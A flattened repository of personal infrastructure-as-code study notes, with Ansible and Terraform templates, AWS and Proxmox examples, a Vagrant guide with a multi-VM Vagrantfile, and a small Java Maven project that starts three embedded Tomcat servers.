PLEASE CONTACT SYSTEM ADMINISTRATOR FOR MODIFICATIONS" 58 | dest: /etc/motd -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/bootstrap_complete.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # =========================================================================================================== 3 | # EXAMPLE OF ALL OTHER PLAYBOOKS 4 | # =========================================================================================================== 5 | - hosts: all 6 | become: true 7 | 8 | # [IMPORTANT] This is the 'local' user 9 | vars: 10 | ansible_user : "mrmachine2" 11 | 12 | tasks: 13 | 14 | # Keep this play here, because you may need in the future to remove or update your key 15 | - name: Add SSH key for user 16 | authorized_key: 17 | user: mrmachine2 18 | key: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpCBoxrn+mROgjyVxRTxmH76gLwPCdkkcYbKjFHEswC ansible" 19 | 20 | # Install packages (use loop) 21 | - name: Install packages 22 | package: 23 | update_cache: yes 24 | name: "{{ item }}" 25 | loop: 26 | - figlet 27 | - git 28 | - tmux -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/files/root-dummy-file: -------------------------------------------------------------------------------- 1 | root dummy file -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/group_vars/all: -------------------------------------------------------------------------------- 1 | group_name: -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/group_vars/servers.yml: -------------------------------------------------------------------------------- 1 | group_name: group name is servers -------------------------------------------------------------------------------- 
/IaC/Ansible/structure-template/handlers/main.yml: -------------------------------------------------------------------------------- 1 | # The name of the handler task, should be the same 2 | # as the reference used during `notify` 3 | - name: root-level-trigger-demo-handler 4 | debug: 5 | msg: "Root level handler was triggered" -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/host_vars/192.168.10.77.yml: -------------------------------------------------------------------------------- 1 | host_var_specific_to_this: This_server_is_77 -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/host_vars/ansible-test-server-1.yml: -------------------------------------------------------------------------------- 1 | ansible_host: 192.168.10.46 2 | host_var_specific_to_this: This_server_is_46 -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/host_vars/ansible-test-server-2.yml: -------------------------------------------------------------------------------- 1 | ansible_host: 192.168.10.47 2 | host_var_specific_to_this: This_server_is_47 -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/hosts/servers.ini: -------------------------------------------------------------------------------- 1 | [servers] 2 | # These are just declarations, but could also be IP or domain names 3 | # See host_vars for actual IPs 4 | ansible-test-server-1 5 | ansible-test-server-2 6 | 7 | [servers:vars] 8 | ansible_user=vm 9 | 10 | -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/hosts/servers.yml: -------------------------------------------------------------------------------- 1 | # ----------------------------------------- 2 | # Option 1: 3 | # all: 4 | # children: 5 | # servers: 6 | # hosts: 7 | 
# # These are just declarations, but could also be IP or domain names 8 | # # See host_vars for actual IPs 9 | # ansible-test-server-1: 10 | # ansible-test-server-2: 11 | # vars: 12 | # ansible_user: vm 13 | 14 | # ----------------------------------------- 15 | # Option 2: 16 | all: 17 | # A. First declare hosts 18 | hosts: 19 | # These are just declarations, but could also be IP or domain names 20 | # See host_vars for actual IPs 21 | ansible-test-server-1: 22 | ansible-test-server-2: 23 | vars: 24 | ansible_user: vm 25 | 26 | # B. Then declare groups 27 | children: 28 | # Our servers group 29 | servers: 30 | hosts: 31 | ansible-test-server-1: 32 | ansible-test-server-2: 33 | 34 | # Another example 35 | group_in_group_example: 36 | children: 37 | servers: 38 | -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/logs/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/roles/base/files/base-role-dummy-file: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CSpyridakis/notes/a51682b5510bc694537a0e1f12914f36d2a3a2a2/IaC/Ansible/structure-template/roles/base/files/base-role-dummy-file -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/roles/base/handlers/main.yml: -------------------------------------------------------------------------------- 1 | # The name of the handler task, should be the same 2 | # as the reference used during `notify` 3 | - name: trigger-role-base-handler 4 | debug: 5 | msg: "Role base handler was triggered" -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/roles/base/tasks/main.yml: 
-------------------------------------------------------------------------------- 1 | - name: Copy role dummy file to servers 2 | copy: 3 | src: base-role-dummy-file 4 | dest: /home/vm/base-role-dummy-file 5 | owner: vm 6 | group: vm 7 | mode: 0644 8 | 9 | # Use hostvars 10 | - name: Print a custom message from inside base role 11 | debug: 12 | msg: "This is a dummy message from host_var_specific_to_this: {{ host_var_specific_to_this }}" 13 | 14 | # Trigger role base handler 15 | - name: This task will trigger handler 16 | changed_when: true 17 | notify: trigger-role-base-handler 18 | debug: 19 | msg: "Trigger role base handler..." -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/templates/dummy-root-template.j2: -------------------------------------------------------------------------------- 1 | Some random value: {{ root_level_template }} -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/vars/other_variables.yml: -------------------------------------------------------------------------------- 1 | vars_file_variable: variable from inside the other_variables file -------------------------------------------------------------------------------- /IaC/Terraform/0-template/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !.gitignore 4 | !*.tfvars -------------------------------------------------------------------------------- /IaC/Terraform/0-template/main.tf: -------------------------------------------------------------------------------- 1 | # CAUTION: THIS IS NOT A WORKING .TF FILE. 
IT SHOULD ONLY BE USED AS A 2 | # REFERENCE TO DESCRIBE TERRAFORM CONCEPTS 3 | 4 | # ================================================================== 5 | # Initial Terraform setup 6 | # ================================================================== 7 | 8 | # When `terraform init` is executed, this section is set up 9 | 10 | terraform { 11 | # Include all the required providers here 12 | required_providers { 13 | # As an example we will use the local provider and the AWS provider 14 | 15 | # A. Local provider 16 | local = { 17 | source = "hashicorp/local" 18 | version = "2.5.1" 19 | } 20 | 21 | # B. AWS provider 22 | aws = { 23 | source = "hashicorp/aws" 24 | version = "5.65.0" 25 | } 26 | } 27 | } 28 | 29 | # ================================================================== 30 | # Configure providers 31 | # ================================================================== 32 | 33 | # A. Configure local provider 34 | provider "local" { 35 | 36 | } 37 | 38 | # B. Configure AWS provider 39 | provider "aws" { 40 | region = "us-east-1" 41 | } 42 | 43 | # ================================================================== 44 | # Configure Resources 45 | # ================================================================== 46 | 47 | # Syntax: 48 | # resource "type" "resource_name" { 49 | # 50 | # } 51 | # Remember `resource_name` is only a reference used by Terraform, not the 
53 | 54 | resource "aws_instance" "web" { 55 | ami = "ami-someami" 56 | instance_type = "t2.micro" 57 | } -------------------------------------------------------------------------------- /IaC/Terraform/1-local/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !providers.tf 3 | !resources.tf 4 | !.gitignore 5 | -------------------------------------------------------------------------------- /IaC/Terraform/1-local/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | local = { 4 | source = "hashicorp/local" 5 | version = "2.5.2" 6 | } 7 | } 8 | } 9 | 10 | provider "local" { 11 | # Configuration options 12 | } -------------------------------------------------------------------------------- /IaC/Terraform/1-local/resources.tf: -------------------------------------------------------------------------------- 1 | resource "local_file" "foo" { 2 | count = 2 # Number of files 3 | 4 | filename = "${path.module}/dummy-file-${count.index}" 5 | content = "This file contains dummy data ${count.index}" 6 | } -------------------------------------------------------------------------------- /IaC/Terraform/2-tfstate-backends/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !providers.tf 3 | !resources.tf 4 | !statefile/ 5 | !.gitignore 6 | -------------------------------------------------------------------------------- /IaC/Terraform/2-tfstate-backends/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | # =============================================== 3 | # Specify here the backend 4 | # =============================================== 5 | 6 | # Option 1: Local Backend (default) 7 | backend "local" { 8 | path = "./statefile/terraform.tfstate" 9 | } 10 | 11 | # Option 2: Remote Backend (e.g. 
S3) 12 | # backend "s3" { 13 | # region = "us-east-1" 14 | # bucket = "bucket-name" 15 | # key = "path/to/key" 16 | # } 17 | # =============================================== 18 | 19 | required_providers { 20 | local = { 21 | source = "hashicorp/local" 22 | version = "2.5.2" 23 | } 24 | } 25 | } 26 | 27 | provider "local" { 28 | # Configuration options 29 | } -------------------------------------------------------------------------------- /IaC/Terraform/2-tfstate-backends/resources.tf: -------------------------------------------------------------------------------- 1 | resource "local_file" "foo" { 2 | filename = "${path.module}/dummy-file" 3 | content = "This file contains dummy data" 4 | } -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !.gitignore 4 | !*.tfvars -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/custom.tfvars: -------------------------------------------------------------------------------- 1 | resource_custom_tfvars = "From inside the custom.tfvars" -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/production.auto.tfvars: -------------------------------------------------------------------------------- 1 | resource_auto_tfvars = "From inside the production.auto.tfvars" -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | local = { 4 | source = "hashicorp/local" 5 | version = "2.5.2" 6 | } 7 | } 8 | } 9 | 10 | provider "local" { 11 | # Configuration options 12 | } -------------------------------------------------------------------------------- 
/IaC/Terraform/3-variables/resources.tf: -------------------------------------------------------------------------------- 1 | # This is a local variable 2 | locals { 3 | files_directory = "${path.module}" 4 | file_extension = "txt" 5 | } 6 | 7 | resource "local_file" "foo" { 8 | filename = "${local.files_directory}/${var.resource_name}.${local.file_extension}" 9 | 10 | # This is also a way to add multiline content 11 | content = < provider.identifier.resource 37 | sensitive = false 38 | } 39 | 40 | 41 | -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/terraform.tfvars: -------------------------------------------------------------------------------- 1 | resource_tfvars = "From inside the terraform.tfvars" -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !*.tfvars 4 | !local-file/ 5 | !.gitignore 6 | -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !*.tfvars 4 | !.gitignore 5 | -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/output.tf: -------------------------------------------------------------------------------- 1 | output "output_filename" { 2 | description = "File name" 3 | value = local_file.foo.filename 4 | sensitive = false 5 | } 6 | 7 | output "output_filecontext" { 8 | description = "File filecontext" 9 | value = local_file.foo.content 10 | sensitive = true 11 | } 12 | 13 | -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/providers.tf: -------------------------------------------------------------------------------- 1 
| terraform { 2 | required_providers { 3 | local = { 4 | source = "hashicorp/local" 5 | version = "2.5.2" 6 | } 7 | } 8 | } 9 | 10 | # provider "local" { 11 | # # Configuration options 12 | # } -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/resources.tf: -------------------------------------------------------------------------------- 1 | resource "local_file" "foo" { 2 | filename = var.filename 3 | content = var.filecontext 4 | } -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/terraform.tfvars: -------------------------------------------------------------------------------- 1 | filename = "filename.txt" 2 | filecontext = "filecontext" -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/variables.tf: -------------------------------------------------------------------------------- 1 | variable "filename" { 2 | description = "File name" 3 | type = string 4 | default = "default.txt" 5 | } 6 | 7 | variable "filecontext" { 8 | description = "File filecontext" 9 | type = string 10 | default = "default" 11 | } -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | local = { 4 | source = "hashicorp/local" 5 | version = "2.5.2" 6 | } 7 | } 8 | } 9 | # ======================================================== 10 | # Use the module 11 | module "create_local_file" { 12 | # Where the module is located 13 | source = "./local-file" 14 | 15 | # Modify internal variables 16 | filename = "${path.module}/use-module-filename.txt" 17 | filecontext = "use-module-content" 18 | } 19 | 20 | # It can also be reused 21 | module "create_local_file2" { 22 | # Where the module is located 23 | source = 
"./local-file" 24 | 25 | # Modify internal variables 26 | filename = "${path.module}/second.txt" 27 | filecontext = "use-module-content-2" 28 | } 29 | 30 | # ======================================================== 31 | # Finally can use outputs from the module 32 | output "local" { 33 | value = [ 34 | module.create_local_file.output_filename, 35 | module.create_local_file.output_filecontext, 36 | ] 37 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/README.md: -------------------------------------------------------------------------------- 1 | # Terraform - AWS 2 | 3 | ## Create Access Keys to connect via AWS cli 4 | 5 | ### 1. Create IAM user 6 | 1. Login to AWS 7 | 2. Search for `IAM` 8 | 3. In `User Managment` 9 | 4. `Users` 10 | 5. `Create User` * 11 | 6. Give username 12 | 7. Provide `Management Console` [ ] 13 | 8. `Next` 14 | 9. Permissions options set to `Attach policies directly` 15 | 10. Give the permissions that you want (e.g. `AdministratorAccess`) 16 | 11. `Next` 17 | 12. `Create User` 18 | 13. DONE! 19 | 20 | ### 2. Create Access Keys 21 | 1. Login to AWS 22 | 2. Search for `IAM` 23 | 3. In `User Managment` 24 | 4. `Users` 25 | 5. `Create access key` 26 | 6. `Command Line Interface (CLI)` 27 | 7. `Next` 28 | 8. Give a description tag 29 | 9. `Next` 30 | 10. DONE! 
31 | 32 | Store now the Access Keys credentials 33 | -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !*.tfvars 4 | !.gitignore 5 | !s3-files/ -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/outputs.tf: -------------------------------------------------------------------------------- 1 | output "output_ubuntu_instance" { 2 | value = [ 3 | for instance in aws_instance.ec2_ubuntu_instance : 4 | "ssh -i ~/.ssh/${var.ec2_key_pair_name} ubuntu@${instance.public_ip}" 5 | ] 6 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | aws = { 4 | source = "hashicorp/aws" 5 | version = "5.93.0" 6 | } 7 | } 8 | } 9 | 10 | provider "aws" { 11 | # Configuration options 12 | region = "us-east-1" 13 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/terraform.tfvars: -------------------------------------------------------------------------------- 1 | ec2_key_pair_name = "TODO" 2 | ec2_key_pair_public_key = "TODO" -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/variables.tf: -------------------------------------------------------------------------------- 1 | variable "ec2_key_pair_name" { 2 | description = "The name of the key pair that we will use to connect to the EC2" 3 | type = string 4 | default = "" 5 | } 6 | 7 | variable "ec2_key_pair_public_key" { 8 | description = "The key pair public value" 9 | type = string 10 | default = "" 11 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/s3/.gitignore: 
-------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !*.tfvars 4 | !.gitignore 5 | !s3-files/ -------------------------------------------------------------------------------- /IaC/Terraform/aws/s3/private-bucket.tf: -------------------------------------------------------------------------------- 1 | # Create bucket 2 | resource "aws_s3_bucket" "tf_s3_private_bucket" { 3 | bucket = "this-example-private-bucket-1234321" 4 | 5 | tags = { 6 | Name = "My bucket" 7 | Environment = "Dev" 8 | } 9 | } 10 | 11 | # Upload all files from s3-files/ directory 12 | resource "aws_s3_object" "tf_s3_private_objects" { 13 | # This is the name of the bucket 14 | bucket = aws_s3_bucket.tf_s3_private_bucket.bucket 15 | 16 | # Parse each file in the ./s3-files/ dir 17 | for_each = fileset("./s3-files", "**") 18 | 19 | # The name of the file when uploaded 20 | key = "${each.key}" # The name of each file 21 | 22 | # The path of the file 23 | source = "./s3-files/${each.key}" 24 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/s3/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | aws = { 4 | source = "hashicorp/aws" 5 | version = "5.93.0" 6 | } 7 | } 8 | } 9 | 10 | provider "aws" { 11 | # Configuration options 12 | region = "us-east-1" 13 | } -------------------------------------------------------------------------------- /IaC/Terraform/proxmox/clone-from-template-vm/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !main.tf 3 | !README.md 4 | !terraform.tfvars 5 | !variables.tf 6 | !.gitignore -------------------------------------------------------------------------------- /IaC/Terraform/proxmox/clone-from-template-vm/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 
| proxmox = { 4 | source = "Telmate/proxmox" 5 | version = "3.0.1-rc6" 6 | } 7 | } 8 | } 9 | 10 | provider "proxmox" { 11 | pm_api_url = var.pm_api_url 12 | pm_api_token_id = var.pm_api_token_id 13 | pm_api_token_secret = var.pm_api_token_secret 14 | pm_tls_insecure = true 15 | pm_debug = true 16 | } 17 | 18 | # Example template names: 'ubuntu-desktop-template' 19 | # This should exist on your Proxmox server as a linked-clone-ready template 20 | 21 | # VM 1: Ubuntu Server 22 | resource "proxmox_vm_qemu" "ubuntu_server" { 23 | name = "ubuntu-server-vm" 24 | vmid = 645 # FIXME: Make sure that it is available 25 | 26 | target_node = var.pm_target_node 27 | clone = var.template_vm 28 | full_clone = true 29 | 30 | # IMPORTANT: make sure the qemu agent is installed in the VM template 31 | # If this is set to 1 and it is NOT properly enabled on the template 32 | # then you will NOT be able to boot 33 | agent = 1 # <--- Required for IP discovery (See below) 34 | 35 | cores = 2 36 | memory = 2048 37 | 38 | disk { 39 | # FIXME: these values may need to be updated 40 | size = "40G" 41 | type = "disk" 42 | storage = "local-lvm" 43 | slot = "scsi0" 44 | discard = true 45 | } 46 | 47 | boot = "order=scsi0;net0" 48 | bootdisk = "scsi0" 49 | 50 | network { 51 | id = 0 52 | model = "virtio" 53 | bridge = var.network_bridge 54 | firewall = false 55 | link_down = false 56 | } 57 | } 58 | 59 | output "ubuntu_server_ip" { 60 | value = proxmox_vm_qemu.ubuntu_server.default_ipv4_address 61 | } 62 | -------------------------------------------------------------------------------- /IaC/Terraform/proxmox/clone-from-template-vm/terraform.tfvars: -------------------------------------------------------------------------------- 1 | pm_api_url = "https://X.X.X.X:8006/api2/json" # FIXME: Adjust to your Proxmox 2 | pm_api_token_id = "terraform@pam!tf_token" # FIXME: Adjust to your Proxmox 3 | pm_api_token_secret = "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" # FIXME: Adjust to your Proxmox 4 | pm_target_node 
= "pve" # FIXME: Adjust to your Proxmox node 5 | network_bridge = "vmbr0" 6 | 7 | template_vm = "vm-template" # FIXME: Adjust to your needs 8 | -------------------------------------------------------------------------------- /IaC/Terraform/proxmox/clone-from-template-vm/variables.tf: -------------------------------------------------------------------------------- 1 | # General Proxmox settings 2 | variable "pm_api_url" { 3 | description = "Proxmox API URL, e.g. https://X.X.X.X:8006/api2/json" 4 | type = string 5 | } 6 | 7 | variable "pm_api_token_id" { 8 | description = "Proxmox API Token ID, e.g. terraform@pam!token" 9 | type = string 10 | } 11 | 12 | variable "pm_api_token_secret" { 13 | description = "Secret for the Proxmox API Token" 14 | type = string 15 | sensitive = true 16 | } 17 | 18 | variable "pm_target_node" { 19 | description = "Target Proxmox node name to deploy the VM" 20 | type = string 21 | } 22 | 23 | variable "network_bridge" { 24 | description = "Network bridge to connect VMs (e.g., vmbr0)" 25 | type = string 26 | } 27 | 28 | # Template names (must exist in Proxmox) 29 | variable "template_vm" { 30 | description = "Template name for VM" 31 | type = string 32 | } 33 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore 3 | !*.tf 4 | 5 | # Only for this dummy example 6 | !*.tfvars 7 | 8 | !modules/ 9 | !modules/* 10 | 11 | !README.md -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/README.md: -------------------------------------------------------------------------------- 1 | FIXME: WORK IN PROGRESS NOT READY YET 2 | 3 | This is a complete runnable Terraform project that demonstrates: 4 | 5 | - Providers 6 | - Resources 7 | - Variables 8 | - Outputs 9 | - Locals 10 | - Modules 11 | - Data sources 12 | - 
Provisioners 13 | - Lifecycle meta-arguments 14 | - Input Validation 15 | - Sensitive Outputs -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/data.tf: -------------------------------------------------------------------------------- 1 | data "null_data_source" "example_data" { 2 | inputs = { 3 | name = "Sample Data" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/locals.tf: -------------------------------------------------------------------------------- 1 | locals { 2 | environment = "production" 3 | } 4 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/main.tf: -------------------------------------------------------------------------------- 1 | module "dummy" { 2 | source = "./modules/dummy" 3 | example_name = var.example_name 4 | example_count = var.example_count 5 | } 6 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/modules/dummy/main.tf: -------------------------------------------------------------------------------- 1 | resource "null_resource" "example" { 2 | count = var.example_count 3 | 4 | provisioner "local-exec" { 5 | command = "echo Hello from ${var.example_name}!" 
6 | } 7 | } 8 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/modules/dummy/outputs.tf: -------------------------------------------------------------------------------- 1 | output "example_message" { 2 | value = "This is an example message from the module" 3 | } 4 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/modules/dummy/terraform.tfvars: -------------------------------------------------------------------------------- 1 | example_name = "Terraform Module" 2 | example_count = 3 -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/modules/dummy/variables.tf: -------------------------------------------------------------------------------- 1 | variable "example_name" { 2 | description = "The name of the example resource" 3 | type = string 4 | default = "Default Example" 5 | } 6 | 7 | variable "example_count" { 8 | description = "The number of resources to create" 9 | type = number 10 | default = 1 11 | } -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/outputs.tf: -------------------------------------------------------------------------------- 1 | output "example_message" { 2 | value = module.dummy.example_message 3 | } -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/providers.tf: -------------------------------------------------------------------------------- 1 | provider "null" { 2 | # version = "3.1.0" 3 | } 4 | 5 | provider "random" { 6 | # version = "3.1.0" 7 | } -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/terraform.tfvars: -------------------------------------------------------------------------------- 1 | example_name = "Root Module Example" 2 | example_count = 
2 -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/variables.tf: -------------------------------------------------------------------------------- 1 | variable "example_name" { 2 | description = "The name of the example" 3 | type = string 4 | default = "Root Example" 5 | } 6 | 7 | variable "example_count" { 8 | description = "The number of resources" 9 | type = number 10 | default = 2 11 | } 12 | 13 | variable "example_map" { 14 | description = "A sample map variable" 15 | type = map(string) 16 | default = { 17 | "key1" = "value1" 18 | "key2" = "value2" 19 | } 20 | } -------------------------------------------------------------------------------- /IaC/Vagrant/README.md: -------------------------------------------------------------------------------- 1 | # Vagrant 2 | This directory contains notes related to [vagrant](https://www.vagrantup.com/). 3 | 4 | ## Installation 5 | ``` 6 | wget -O - https://apt.releases.hashicorp.com/gpg | sudo gpg --dearmor -o /usr/share/keyrings/hashicorp-archive-keyring.gpg 7 | echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list 8 | sudo apt update && sudo apt install vagrant 9 | ``` 10 | **CAUTION: in order to leverage vagrant, make sure that either VMware or VirtualBox is installed on your system.** 11 | 12 | ## Addons 13 | Install addons: 14 | `vagrant plugin install <plugin-name>` 15 | 16 | * `hostmanager` 17 | Adds to the /etc/hosts of each VM any other VMs that exist in the same `Vagrantfile`. 18 | ``` 19 | vagrant plugin install vagrant-hostmanager 20 | ``` 21 | 22 | ## Initialization 23 | 24 | Visit [vagrant discover](https://portal.cloud.hashicorp.com/vagrant/discover) to find the desired box. Then copy its name and run the following command: 25 | `vagrant init <box-name>` 26 | 27 | e.g. 
To use an Ubuntu focal64 box run: 28 | `vagrant init ubuntu/focal64 --box-version 20240821.0.1` 29 | 30 | A `Vagrantfile` will appear in the same directory. 31 | 32 | ## Useful commands: 33 | 34 | * Start the VM 35 | `vagrant up` 36 | 37 | * Power off the VM 38 | `vagrant halt` 39 | 40 | * Status (of the VMs defined in this particular dir) 41 | `vagrant status` 42 | 43 | * Status of all VMs 44 | `vagrant global-status` 45 | 46 | * Reboot VM 47 | `vagrant reload` 48 | 49 | * Delete VM 50 | `vagrant destroy` 51 | 52 | * List downloaded boxes 53 | `vagrant box list` 54 | 55 | * Login to the VM 56 | `vagrant ssh <vm-name> # If only one VM exists, the name is optional` 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /IaC/Vagrant/multi-vms/Vagrantfile: -------------------------------------------------------------------------------- 1 | Vagrant.configure("2") do |config| 2 | # Define the first VM using CentOS 3 | config.vm.define "centos_vm" do |centos| 4 | centos.vm.box = "centos/8" # CentOS 8 5 | # centos.vm.network "private_network", type: "dhcp", ip: "192.168.33.10" # Static IP on private network 6 | centos.vm.network "public_network" # Bridged to the external network 7 | centos.vm.provider "virtualbox" do |vb| 8 | vb.memory = "800" # 800 MB of memory 9 | end 10 | 11 | # Shared folder 12 | centos.vm.synced_folder "./cent01", "/vagrant/cent01" 13 | 14 | # Provisioning section for CentOS 15 | centos.vm.provision "shell", inline: <<-SHELL 16 | # Example provisioning script for CentOS 17 | echo "Provisioning CentOS VM" 18 | SHELL 19 | end 20 | 21 | # ========================================================================== 22 | 23 | # Define the second VM using Ubuntu 24 | config.vm.define "ubuntu_vm1" do |ubuntu1| 25 | ubuntu1.vm.box = "ubuntu/bionic64" # Ubuntu 18.04 LTS 26 | # ubuntu1.vm.network "private_network", type: "dhcp", ip: "192.168.33.11" # Static IP on private network 27 |
ubuntu1.vm.network "public_network" # Bridged to the external network 28 | ubuntu1.vm.provider "virtualbox" do |vb| 29 | vb.memory = "700" # 700 MB of memory 30 | end 31 | 32 | # Shared folder 33 | ubuntu1.vm.synced_folder "./ubu01", "/vagrant/ubu01" 34 | 35 | # Provisioning section for Ubuntu 1 36 | ubuntu1.vm.provision "shell", inline: <<-SHELL 37 | # Example provisioning script for Ubuntu 38 | echo "Provisioning Ubuntu VM" 39 | SHELL 40 | end 41 | end 42 | -------------------------------------------------------------------------------- /Java/Maven-http-server/.gitignore: -------------------------------------------------------------------------------- 1 | tomcat.*/ 2 | target/ -------------------------------------------------------------------------------- /Java/Maven-http-server/README.md: -------------------------------------------------------------------------------- 1 | # Simple HTTP Server using Maven 2 | This codebase can be used as a template or as a starting point for evaluating other tools 3 | 4 | ## Useful Commands 5 | | Command | Description | 6 | | ------- | ------------| 7 | | `mvn clean` | Clean the project (delete the target directory) | 8 | | `mvn compile` | Compile the Project | 9 | | `mvn exec:java` | Run the Project | 10 | | `mvn package` | Package the project into a JAR | 11 | | `mvn clean package` | Run this every time you make changes to `pom.xml` | 12 | | `mvn checkstyle:check` | Create checkstyle report | -------------------------------------------------------------------------------- /Java/Maven-http-server/checkstyle.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Java/Maven-http-server/src/main/java/com/example/App.java: -------------------------------------------------------------------------------- 1 | package com.example; 2 | 3 | import
org.apache.catalina.LifecycleException; 4 | import org.apache.catalina.startup.Tomcat; 5 | 6 | import java.io.File; 7 | import java.util.ArrayList; 8 | import java.util.List; 9 | import java.util.concurrent.ExecutorService; 10 | import java.util.concurrent.Executors; 11 | import java.util.logging.Level; 12 | import java.util.logging.Logger; 13 | 14 | public class App { 15 | private static final Logger LOGGER = Logger.getLogger(App.class.getName()); 16 | 17 | public static void main(String[] args) { 18 | int serverCount = 3; // Number of Tomcat instances 19 | int basePort = 57890; 20 | 21 | ExecutorService executor = Executors.newFixedThreadPool(serverCount); 22 | List<TomcatServer> servers = new ArrayList<>(); 23 | 24 | for (int i = 0; i < serverCount; i++) { 25 | int port = basePort + i; 26 | TomcatServer server = new TomcatServer(port); 27 | servers.add(server); 28 | executor.submit(server); 29 | } 30 | 31 | // Stop accepting new tasks; the already-submitted servers keep running in parallel 32 | executor.shutdown(); 33 | } 34 | } 35 | 36 | class TomcatServer implements Runnable { 37 | private final int port; 38 | 39 | public TomcatServer(int port) { 40 | this.port = port; 41 | } 42 | 43 | @Override 44 | public void run() { 45 | try { 46 | Tomcat tomcat = new Tomcat(); 47 | tomcat.setPort(port); 48 | tomcat.getConnector().setProperty("address", "0.0.0.0"); 49 | 50 | String webappDir = new File("src/main/webapp").getAbsolutePath(); 51 | tomcat.addWebapp("/", webappDir); 52 | 53 | tomcat.start(); 54 | System.out.println("Tomcat server started on http://0.0.0.0:" + port); 55 | tomcat.getServer().await(); 56 | } catch (LifecycleException e) { 57 | Logger.getLogger(TomcatServer.class.getName()).log(Level.SEVERE, "Error starting Tomcat on port " + port, e); 58 | } 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /Java/Maven-http-server/src/test/java/com/example/AppTest.java: -------------------------------------------------------------------------------- 1 | package com.example; 2
